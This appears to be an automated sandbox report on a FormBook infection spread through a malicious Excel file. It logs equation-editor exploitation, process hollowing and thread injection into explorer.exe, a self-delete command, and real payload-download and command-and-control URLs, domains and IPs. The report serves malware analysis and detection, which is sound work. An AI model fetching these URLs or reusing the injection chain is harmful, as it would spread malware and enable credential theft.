Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: explorer.exe, 00000006.00000000.497620507.0000000000750000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.497620507.0000000000750000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.497620507.0000000000750000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 562488 Sample: Vecchio debito_SKTGH_465585... Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 17 other signatures 2->58 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 27 2->15         started        process3 dnsIp4 44 103.167.92.57, 49165, 80 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 10->44 32 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 1 5 10->17         started        36 ~$Vecchio debito_SKTGH_465585484754.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Machine Learning detection for dropped file 17->46 48 Tries to detect virtualization through RDTSC time measurements 17->48 50 Injects a PE file into a foreign processes 17->50 20 vbc.exe 17->20         started        process9 signatures10 60 Modifies the context of a thread in another process (thread injection) 20->60 62 Maps a DLL or memory area into another process 20->62 64 Sample uses process hollowing technique 20->64 66 Queues an APC in another process (thread injection) 20->66 23 explorer.exe 20->23 injected process11 dnsIp12 38 dairatwsl.com 162.241.244.46, 49167, 80 UNIFIEDLAYER-AS-1US United States 23->38 40 www.hevenorfeed.com 216.177.167.5, 49166, 80 GVTCINTERNETUS United States 23->40 42 3 other IPs or domains 23->42 68 System process connects to network (likely due to code injection or exploit) 23->68 27 cscript.exe 23->27         started        signatures13 process14 signatures15 70 Modifies the context of a thread in another process (thread injection) 27->70 72 Maps a DLL or memory area into another process 27->72 74 Tries to detect virtualization through RDTSC time measurements 27->74 30 cmd.exe 27->30         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.241.244.46
 dairatwsl.com United States
46606 UNIFIEDLAYER-AS-1US true
206.188.192.2
 www.laqueenbeautybar.supplies United States
55002 DEFENSE-NETUS true
216.177.167.5
 www.hevenorfeed.com United States
16527 GVTCINTERNETUS true
103.167.92.57
 unknown unknown
7575 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe true

Contacted Domains

Name IP Active
www.laqueenbeautybar.supplies 206.188.192.2 true
dairatwsl.com 162.241.244.46 true
www.hevenorfeed.com 216.177.167.5 true
www.vacoveco.com unknown unknown
www.dairatwsl.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.hevenorfeed.com/yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A== true
  • Avira URL Cloud: safe
 unknown
http://www.laqueenbeautybar.supplies/yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw== true
  • Avira URL Cloud: safe
 unknown
http://103.167.92.57/CRC/vbc.exe true
  • Avira URL Cloud: malware
 unknown
http://www.dairatwsl.com/yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMP true
  • Avira URL Cloud: safe
 unknown
www.drmichaelirvine.com/yrcy/ true
  • Avira URL Cloud: malware
 low